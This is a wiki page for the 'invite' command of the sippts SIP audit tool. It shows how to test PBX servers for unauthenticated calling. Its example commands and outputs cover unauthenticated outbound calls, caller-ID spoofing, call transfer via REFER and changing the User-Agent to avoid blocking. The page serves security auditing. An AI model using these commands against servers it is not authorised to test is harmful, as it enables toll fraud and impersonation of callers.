Command invite - Pepelux/sippts GitHub Wiki
SIPPTS invite checks if a PBX server allows us to make calls without authentication. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.
For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass.
Invite allows us to:
- Connection via UDP, TCP or TLS protocol.
- Test remotely if a SIP server requires authentication to make calls.
- Make calls without auth if the server has a bad configuration.
- Transfer established calls to a second external number (1).
- Alter the Callerid if the server allows it.
- Analyze responses using verbose mode.
- Allow us to customize the UserAgent.
- It can use a valid user/pass to make calls with authentication.
(1) If you can send an INVITE through a bad configured server and the call sounds on the target number, it is possible to send a second message (a REFER on this case) to transfer the call to another number:
SIPPTS SIP Server Phone1 Phone2
---> INVITE --->
---> INVITE --->
<--- 100 Trying <---
<--- 100 Trying <---
<--- 180 Ringing <---
<--- 180 Ringing <---
<--- 200 Ok <---
<--- 200 Ok <---
---> ACK --->
<--- 200 Ok <---
---> REFER --->
---> INVITE --->
<--- 202 Accept <---
<---> RTP Session <--->
$ sippts invite -h
Target:
-i IP|HOST Target IP address
-r REMOTE_PORT Remote port (default: 5060)
-p PROTOCOL Protocol: udp|tcp|tls (default: udp)
-l LOCAL_PORT Local port (default: first free)
-proxy IP:PORT Use an outbound proxy (ex: 192.168.1.1 or 192.168.1.1:5070)
Headers:
-d DOMAIN SIP Domain or IP address. Ex: my.sipserver.com (default: target IP address)
-cd CONTACT_DOMAIN Domain or IP address for Contact header. Ex: 10.0.1.2
-fn FROM_NAME From Name. Ex: Bob
-fu FROM_USER From User (default: 100)
-fd FROM_DOMAIN From Domain. Ex: 10.0.0.1
-ft FROM_TAG From Tag
-tn TO_NAME To Name. Ex: Alice
-tu TO_USER To User (default: 100)
-td TO_DOMAIN To Domain. Ex: 10.0.0.1
-ua USER_AGENT User-Agent header (default: pplsip)
-ppi PPI P-Preferred-Identity
-pai PAI P-Asserted-Identity
-no-sdp Do not send SDP (by default is included)
-sdes Send SDES in SDP
Auth:
-user AUTH_USER Authentication user
-pass AUTH_PASS Authentication password
Log:
-v Increase verbosity
-nocolor Show result without colors
-o FILE Save data into a log file
Other options:
-t NUMBER Phone number to transfer the call
-th THREADS Number of threads (default: 200)
-local-ip IP Set local IP address (by default try to get it)
-h, --help Show this help
- Trying to make a call to the exten 100 (without auth).
$ sippts invite -i 192.168.0.1 -tu 100
- Trying to make a call to the exten 100 (with auth).
$ sippts invite -i 192.168.0.1 --user sipuser --pass supersecret -tu 100
- Trying to make a call to the number 555555555 (without auth) with source number 200.
$ sippts invite -i 192.168.0.1 -fu 200 -tu 555555555 -v
- Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
$ sippts invite -i 192.168.0.1 -tu 555555555 -t 444444444
- Trying to make a call to the number 555555555 (without auth) using callerid 123456789 and transfer it to number 444444444.
$ sippts invite -i 192.168.0.1 -tu 555555555 -t 444444444 -fu 123456789
- Maybe 'pplsip' is a known UserAgent and the system automatically blocks the SIP messages. You can change it with a -ua parameter.
$ sippts invite -i 192.168.0.1 -tu 555555555 -ua myUserAgent
- The call from de Devil };->
$ sippts invite -i 192.168.0.1 -tu 555555555 -fu 666666666 -fn Devil
- Asterisk server with a well-configured context could allow us to make calls without user authentication:
$ sippts invite -i 192.168.0.55 -tu 0034666666666
[+] Sending INVITE 100 => 0034666666666
[-] 404 Not Found
On the Asterisk console you can see something similar to this:
NOTICE[1034]: chan_sip.c:22753 handle_request_invite: Call from '' (X.X.X.X:5070) to extension '0034666666666' rejected because extension not found in context 'default'.
- Asterisk server with a bad-configured context and that also allows us to make calls without user authentication:
$ sippts invite -i 192.168.0.55 -tu 0034666666666
[+] Sending INVITE 100 => 0034666666666
[-] 100 Trying
[-] 183 Session Progress
[-] 200 OK
On the Asterisk console you can see something similar to this:
== Using SIP RTP CoS mark 5
-- Executing [0034666666666@default:1] Dial("SIP/192.160.0.55-00000001", "SIP/trunk/0034666666666,30") in new stack
== Using SIP RTP CoS mark 5
-- Called SIP/trunk/0034666666666
Trying a transfer in the same vulnerable server:
$ sippts invite -i 192.168.0.55 -tu 0034666666666 -t 0034777777777
[+] Sending INVITE 100 => 0034666666666
[-] 100 Trying
[-] 183 Session Progress
[-] 200 OK
[+] Sending ACK
[+] Sending REFER 100 => 0034777777777
[-] 202 Accepted
On the Asterisk console you can see something similar to this:
== Using SIP RTP CoS mark 5
-- Executing [0034666666666@default:1] Dial("SIP/192.168.0.55-00000000", "SIP/trunk/0034666666666,30") in new stack
== Using SIP RTP CoS mark 5
-- Called SIP/trunk/0034666666666
-- SIP/trunk-00000001 is making progress passing it to SIP/192.168.0.55-00000000
-- SIP/trunk-00000001 answered SIP/192.168.0.55-00000000
-- Remotely bridging SIP/192.168.0.55-00000000 and SIP/trunk-00000001
-- Executing [0034777777777@default:1] Dial("SIP/trunk-00000001", "SIP/trunk/0034777777777,30") in new stack
== Using SIP RTP CoS mark 5
-- Called SIP/trunk/0034777777777